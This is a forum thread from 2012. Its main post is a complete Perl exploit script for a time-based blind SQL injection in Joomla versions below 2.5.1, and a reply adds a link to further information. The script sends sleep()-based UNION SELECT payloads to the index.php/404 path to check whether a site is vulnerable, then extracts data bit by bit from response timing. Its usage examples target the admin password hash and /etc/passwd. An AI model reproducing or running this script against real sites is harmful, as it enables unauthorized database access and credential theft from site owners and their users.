LLegoLLaS Posted March 19, 2012 Report Share Posted March 19, 2012 File:#!/usr/bin/perl# Thu Mar 15 22:55:32 CET 2012 A. Ramos <aramosf()unsec.net> # www.securitybydefault.com# Joomla <2.5.1 time based sql injection - vuln by Colin Wong## using sleep() and not benchmark(), change for < mysql 5.0.12## 1.- Database name: database()# 2.- Users data table name: (change 'joomla' for database() result)# select table_name from information_schema.tables where table_schema = "joomla" and table_name like "%_users"# 3.- Admin password: (change zzz_users from previus sql query result)# select password from zzzz_users limit 1use strict;use LWP::UserAgent;$| = 1;my $url = $ARGV[0];my $wtime = $ARGV[1];my $sql = $ARGV[2];unless ($ARGV[2]) {print "$0 <url> <waittime> <sql>\n";print "\texamples:\n";print "\t get admin password:\n";print "\t\t$0 http://host/joomla/ 3 'database()'\n";print "\t\t$0 http://host/joomla/ 3 'select table_name from information_schema.tables where table_schema=\"joomla\" and table_name like \"%25_users\"\'\n";print "\t\t$0 http://host/joomla/ 3 'select password from zzzz_users limit 1'\n";print "\t get file /etc/passwd\n";print "\t\t$0 http://host/joomla/ 3 'load_file(\"/etc/passwd\")'\n";exit 1;}my ($len,$sqldata);my $ua = LWP::UserAgent->new;$ua->timeout(60);$ua->env_proxy;my $stime = time();my $res = $ua->get($url);my $etime = time();my $regrtt = $etime - $stime;print "rtt: $regrtt secs\n";print "vuln?: ";my $sleep = $regrtt + $wtime;$stime = time();$res = $ua->get($url."/index.php/404' union select sleep($sleep) union select '1");$etime = time();my $rtt = $etime - $stime;if ($rtt >= $regrtt + $wtime) { print "ok!\n"; } else { print "nope \n"; exit 1; }my $lenoflen;sub len {# length of lengthfor (1..5) {my $sql=$_[0];$stime = time();$res = $ua->get($url."/index.php/404' union select if(length(length(($sql)))=$_,sleep($wtime),null) union select '1");$etime = time();my $rtt = $etime - $stime;if ($rtt >= $regrtt + $wtime) {$lenoflen = $_;last;}}for (1..$lenoflen) {my $ll;$ll=$_;for (0..9) {my $sql=$_[0];$stime = time();$res = $ua->get($url."/index.php/404' union select if(mid(length(($sql)),$ll,1)=$_,sleep($wtime),null) union select '1");$etime = time();my $rtt = $etime - $stime;if ($rtt >= $regrtt + $wtime) {$len .= $_;}}}return $len;}sub data {my $sql = $_[0];my $len = $_[1];my ($bit, $str, @byte);my $high = 128;for (1..$len) {my $c=8;@byte="";my $a=$_;for ($bit=1;$bit<=$high;$bit*=2) {$stime = time();# select if((ord(mid((load_file("/etc/passwd")),1,1)) & 64)=0,sleep(2),null) union select '1';$res = $ua->get($url."/index.php/404' union select if((ord(mid(($sql),$a,1)) & $bit)=0,sleep($wtime),null) union select '1");$etime = time();my $rtt = $etime - $stime;if ($rtt >= $regrtt + $wtime) {$byte[$c]="0";} else { $byte[$c]="1"; }$c--;}$str = join("",@byte);print pack("B*","$str");}}$len = len($sql);print "$sql length: $len\n";print "$sql data:\n\n";data($sql,$len);Copyright 2012 - BugSearchAbout Us - Tell a Friend - Send sursa: BugSearch Quote Link to comment Share on other sites More sharing options...
Nytro Posted March 20, 2012 Report Share Posted March 20, 2012 Info: http://www.securitybydefault.com/2012/03/exploit-de-joomla-paso-paso.html Quote Link to comment Share on other sites More sharing options...
